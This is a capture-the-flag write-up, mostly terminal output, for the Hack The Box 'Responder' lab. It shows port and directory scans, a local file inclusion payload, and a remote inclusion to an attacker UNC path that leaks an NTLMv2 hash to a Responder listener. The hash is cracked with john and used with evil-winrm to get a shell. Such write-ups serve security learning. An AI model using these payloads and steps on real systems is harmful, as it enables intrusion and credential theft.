Responder
Port recognition withnmap
or you can use recon
┌──(root@ghost)-[/home/ghost]
└─# recon responder.htb
.o oOOOOOOOo OOOo
Ob.OOOOOOOo OOOo. oOOo. .adOOOOOOO
OboO"""""""""""".OOo. .oOOOOOo. OOOo.oOOOOOo.."""""""""'OO
OOP.oOOOOOOOOOOO "POOOOOOOOOOOo. `"OOOOOOOOOP,OOOOOOOOOOOB'
`O'OOOO' `OOOOo"OOOOOOOOOOO` .adOOOOOOOOO"oOOO' `OOOOo
.OOOO' `OOOOOOOOOOOOOOOOOOOOOOOOOO' `OO
OOOOO '"OOOOOOOOOOOOOOOO"` oOO
oOOOOOba. .adOOOOOOOOOOba .adOOOOo.
oOOOOOOOOOOOOOba. .adOOOOOOOOOO@^OOOOOOOba. .adOOOOOOOOOOOO
OOOOOOOOOOOOOOOOO.OOOOOOOOOOOOOO"` '"OOOOOOOOOOOOO.OOOOOOOOOOOOOO
"OOOO" "YOoOOOOMOIONODOO"` . '"OOROAOPOEOOOoOY" "OOO"
Y 'OOOOOOOOOOOOOO: .oOOo. :OOOOOOOOOOO?' :`
: .oO%OOOOOOOOOOo.OOOOOO.oOOOOOOOOOOOO? .
. oOOP"%OOOOOOOOoOOOOOOO?oOOOOO?OOOO"OOo
'%o OOOO"%OOOO%"%OOOOO"OOOOOO"OOO':
`$" `OOOO' `O"Y ' `OOOO' o .
. . OP" : o .
:
.
[R3C0N] by 0bfxgh0st 4 WWA with ❤
B.O.T.N.E.T. created by Binlaab
[OS] Windows (99%)
Starting Nmap 7.92 ( https://nmap.org ) at 2022-07-21 13:25 EDT
NSE: Loaded 1 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 13:25
Completed NSE at 13:25, 0.00s elapsed
Initiating Ping Scan at 13:25
Scanning responder.htb (10.129.55.46) [4 ports]
Completed Ping Scan at 13:25, 0.06s elapsed (1 total hosts)
Initiating SYN Stealth Scan at 13:25
Scanning responder.htb (10.129.55.46) [65535 ports]
Discovered open port 7680/tcp on 10.129.55.46
Completed SYN Stealth Scan at 13:26, 26.74s elapsed (65535 total ports)
NSE: Script scanning 10.129.55.46.
Initiating NSE at 13:26
Completed NSE at 13:26, 0.00s elapsed
Nmap scan report for responder.htb (10.129.55.46)
Host is up (0.076s latency).
Not shown: 65534 filtered tcp ports (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT STATE SERVICE
7680/tcp open pando-pub
NSE: Script Post-scanning.
Initiating NSE at 13:26
Completed NSE at 13:26, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 27.07 seconds
Raw packets sent: 131076 (5.767MB) | Rcvd: 5 (204B)
recon reports open tcp port 7680 pando-pub
┌──(root@ghost)-[/home/ghost]
└─# curl http://responder.htb
<meta http-equiv="refresh" content="0;url=http://unika.htb/">
We obtain a new domain name so add it to /etc/hosts, time to recon the new domain
┌──(root@ghost)-[/home/ghost]
└─# recon unika.htb
.o oOOOOOOOo OOOo
Ob.OOOOOOOo OOOo. oOOo. .adOOOOOOO
OboO"""""""""""".OOo. .oOOOOOo. OOOo.oOOOOOo.."""""""""'OO
OOP.oOOOOOOOOOOO "POOOOOOOOOOOo. `"OOOOOOOOOP,OOOOOOOOOOOB'
`O'OOOO' `OOOOo"OOOOOOOOOOO` .adOOOOOOOOO"oOOO' `OOOOo
.OOOO' `OOOOOOOOOOOOOOOOOOOOOOOOOO' `OO
OOOOO '"OOOOOOOOOOOOOOOO"` oOO
oOOOOOba. .adOOOOOOOOOOba .adOOOOo.
oOOOOOOOOOOOOOba. .adOOOOOOOOOO@^OOOOOOOba. .adOOOOOOOOOOOO
OOOOOOOOOOOOOOOOO.OOOOOOOOOOOOOO"` '"OOOOOOOOOOOOO.OOOOOOOOOOOOOO
"OOOO" "YOoOOOOMOIONODOO"` . '"OOROAOPOEOOOoOY" "OOO"
Y 'OOOOOOOOOOOOOO: .oOOo. :OOOOOOOOOOO?' :`
: .oO%OOOOOOOOOOo.OOOOOO.oOOOOOOOOOOOO? .
. oOOP"%OOOOOOOOoOOOOOOO?oOOOOO?OOOO"OOo
'%o OOOO"%OOOO%"%OOOOO"OOOOOO"OOO':
`$" `OOOO' `O"Y ' `OOOO' o .
. . OP" : o .
:
.
[R3C0N] by 0bfxgh0st 4 WWA with ❤
Cyberapocalypse 2022 whoohoo !
[OS] Windows (99%)
Starting Nmap 7.92 ( https://nmap.org ) at 2022-07-21 13:34 EDT
NSE: Loaded 1 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 13:34
Completed NSE at 13:34, 0.00s elapsed
Initiating Ping Scan at 13:34
Scanning unika.htb (10.129.55.46) [4 ports]
Completed Ping Scan at 13:34, 0.11s elapsed (1 total hosts)
Initiating SYN Stealth Scan at 13:34
Scanning unika.htb (10.129.55.46) [65535 ports]
Discovered open port 80/tcp on 10.129.55.46
Discovered open port 5985/tcp on 10.129.55.46
Completed SYN Stealth Scan at 13:34, 26.36s elapsed (65535 total ports)
NSE: Script scanning 10.129.55.46.
Initiating NSE at 13:34
Completed NSE at 13:34, 0.00s elapsed
Nmap scan report for unika.htb (10.129.55.46)
Host is up (0.065s latency).
rDNS record for 10.129.55.46: responder.htb
Not shown: 65533 filtered tcp ports (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT STATE SERVICE
80/tcp open http
5985/tcp open wsman
NSE: Script Post-scanning.
Initiating NSE at 13:34
Completed NSE at 13:34, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 26.64 seconds
Raw packets sent: 131091 (5.768MB) | Rcvd: 22 (952B)
[+] [fuzzin server]
http://unika.htb [200 OK] Apache[2.4.52], Bootstrap, Country[RESERVED][ZZ], Email[info@unika.htb], HTML5, HTTPServer[Apache/2.4.52 (Win64) OpenSSL/1.1.1m PHP/8.1.1], IP[10.129.55.46], JQuery[1.11.1], OpenSSL[1.1.1m], PHP[8.1.1], Script, Title[Unika], X-Powered-By[PHP/8.1.1], X-UA-Compatible[IE=edge]
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Thu Jul 21 13:34:43 2022
URL_BASE: http://unika.htb:80/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
OPTION: Not Recursive
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://unika.htb:80/ ----
+ http://unika.htb:80/aux (CODE:403|SIZE:298)
+ http://unika.htb:80/cgi-bin/ (CODE:403|SIZE:298)
+ http://unika.htb:80/com1 (CODE:403|SIZE:298)
+ http://unika.htb:80/com2 (CODE:403|SIZE:298)
+ http://unika.htb:80/com3 (CODE:403|SIZE:298)
+ http://unika.htb:80/con (CODE:403|SIZE:298)
==> DIRECTORY: http://unika.htb:80/css/
+ http://unika.htb:80/examples (CODE:503|SIZE:398)
==> DIRECTORY: http://unika.htb:80/img/
==> DIRECTORY: http://unika.htb:80/inc/
+ http://unika.htb:80/index.php (CODE:200|SIZE:46453)
==> DIRECTORY: http://unika.htb:80/js/
+ http://unika.htb:80/licenses (CODE:403|SIZE:417)
+ http://unika.htb:80/lpt1 (CODE:403|SIZE:298)
+ http://unika.htb:80/lpt2 (CODE:403|SIZE:298)
+ http://unika.htb:80/nul (CODE:403|SIZE:298)
+ http://unika.htb:80/phpmyadmin (CODE:403|SIZE:417)
+ http://unika.htb:80/prn (CODE:403|SIZE:298)
+ http://unika.htb:80/server-info (CODE:403|SIZE:417)
+ http://unika.htb:80/server-status (CODE:403|SIZE:417)
+ http://unika.htb:80/webalizer (CODE:403|SIZE:417)
-----------------
END_TIME: Thu Jul 21 13:44:11 2022
DOWNLOADED: 4612 - FOUND: 17
We obtain a lot information. Open ports are 80 for web service and 5985 for wsman. New web dirs were found too. After navigate in unika.htb website we found a possible Local File Inclusion in http://unika.htb/index.php?page=french.html
┌──(root@ghost)-[/home/ghost]
└─# curl "http://unika.htb/index.php?page=C:/windows/system32/drivers/etc/hosts"
# Copyright (c) 1993-2009 Microsoft Corp.
#
# This is a sample HOSTS file used by Microsoft TCP/IP for Windows.
#
# This file contains the mappings of IP addresses to host names. Each
# entry should be kept on an individual line. The IP address should
# be placed in the first column followed by the corresponding host name.
# The IP address and the host name should be separated by at least one
# space.
#
# Additionally, comments (such as these) may be inserted on individual
# lines or following the machine name denoted by a '#' symbol.
#
# For example:
#
# 102.54.94.97 rhino.acme.com # source server
# 38.25.63.10 x.acme.com # x client host
# localhost name resolution is handled within DNS itself.
# 127.0.0.1 localhost
# ::1 localhost
We have LFI. After a workaround we can try a RFI, let's start responder listener
┌──(root@ghost)-[/home/ghost]
└─# responder -I tun0
__
.----.-----.-----.-----.-----.-----.--| |.-----.----.
| _| -__|__ --| _ | _ | | _ || -__| _|
|__| |_____|_____| __|_____|__|__|_____||_____|__|
|__|
NBT-NS, LLMNR & MDNS Responder 3.1.1.0
Author: Laurent Gaffie (laurent.gaffie@gmail.com)
To kill this script hit CTRL-C
[+] Poisoners:
LLMNR [ON]
NBT-NS [ON]
MDNS [ON]
DNS [ON]
DHCP [OFF]
[+] Servers:
HTTP server [ON]
HTTPS server [ON]
WPAD proxy [OFF]
Auth proxy [OFF]
SMB server [ON]
Kerberos server [ON]
SQL server [ON]
FTP server [ON]
IMAP server [ON]
POP3 server [ON]
SMTP server [ON]
DNS server [ON]
LDAP server [ON]
RDP server [ON]
DCE-RPC server [ON]
WinRM server [ON]
[+] HTTP Options:
Always serving EXE [OFF]
Serving EXE [OFF]
Serving HTML [OFF]
Upstream Proxy [OFF]
[+] Poisoning Options:
Analyze Mode [OFF]
Force WPAD auth [OFF]
Force Basic Auth [OFF]
Force LM downgrade [OFF]
Force ESS downgrade [OFF]
[+] Generic Options:
Responder NIC [tun0]
Responder IP [10.10.14.145]
Responder IPv6 [dead:beef:2::108f]
Challenge set [random]
Don't Respond To Names ['ISATAP']
[+] Current Session Variables:
Responder Machine Name [WIN-W34A17CNUZZ]
Responder Domain Name [3QQ2.LOCAL]
Responder DCE-RPC Port [49451]
[+] Listening for events...
Now responder is waiting for events, the idea is to send a request to our ip address
┌──(root@ghost)-[/home/ghost]
└─# curl "http://unika.htb/index.php?page=//10.10.14.145/whatever"
<br />
<b>Warning</b>: include(\\10.10.14.145\WHATEVER): Failed to open stream: Permission denied in <b>C:\xampp\htdocs\index.php</b> on line <b>11</b><br />
<br />
<b>Warning</b>: include(): Failed opening '//10.10.14.145/whatever' for inclusion (include_path='\xampp\php\PEAR') in <b>C:\xampp\htdocs\index.php</b> on line <b>11</b><br />
Back to the responder listener
┌──(root@ghost)-[/home/ghost]
└─# responder -I tun0
...
[+] Listening for events...
[SMB] NTLMv2-SSP Client : ::ffff:10.129.55.46
[SMB] NTLMv2-SSP Username : RESPONDER\Administrator
[SMB] NTLMv2-SSP Hash : Administrator::RESPONDER:c3fb49ee7a1d349e:D78072991A20AB6E1381A0E480B0BB2E:0101000000000000005428D0099DD8017845736ECA1D83ED0000000002000800330051005100320001001E00570049004E002D0057003300340041003100370043004E0055005A005A0004003400570049004E002D0057003300340041003100370043004E0055005A005A002E0033005100510032002E004C004F00430041004C000300140033005100510032002E004C004F00430041004C000500140033005100510032002E004C004F00430041004C0007000800005428D0099DD8010600040002000000080030003000000000000000010000000020000047837337164CDA46D9E36DBD2A67E2CBAF58CC48DB000FEE746C2D5F366CC35C0A001000000000000000000000000000000000000900220063006900660073002F00310030002E00310030002E00310034002E003100340035000000000000000000
After curl our ip address and get RFI we will see a NTLM hash dump
┌──(root@ghost)-[/home/ghost]
└─# john --wordlist=rockyou.txt hash
Created directory: /root/.john
Using default input encoding: UTF-8
Loaded 1 password hash (netntlmv2, NTLMv2 C/R [MD4 HMAC-MD5 32/64])
Press 'q' or Ctrl-C to abort, almost any other key for status
badminton (Administrator)
1g 0:00:00:00 DONE (2022-07-21 14:08) 33.33g/s 113066p/s 113066c/s 113066C/s hellboy..stargirl
Use the "--show --format=netntlmv2" options to display all of the cracked passwords reliably
Session completed.
We cracked and obtained valid credentials to connect to wsman service
┌──(root@ghost)-[/home/ghost]
└─# evil-winrm -i 10.129.174.83 -u administrator -p 'badminton'
PS C:\Users\Administrator\Documents> cd C:\Users\mike\Desktop
PS C:\Users\mike\Desktop> type flag.txt
ea81b7afddd03efaa0945333ed147fac
Navigate to C:\Users\mike\Desktop\flag.txt to see the flag
┌──(root@ghost)-[/home/ghost]
└─# curl "http://unika.htb/index.php?page=C:\Users\mike\Desktop\flag.txt"
ea81b7afddd03efaa0945333ed147fac
As you can see is possible obtain the flag knowing the path through LFI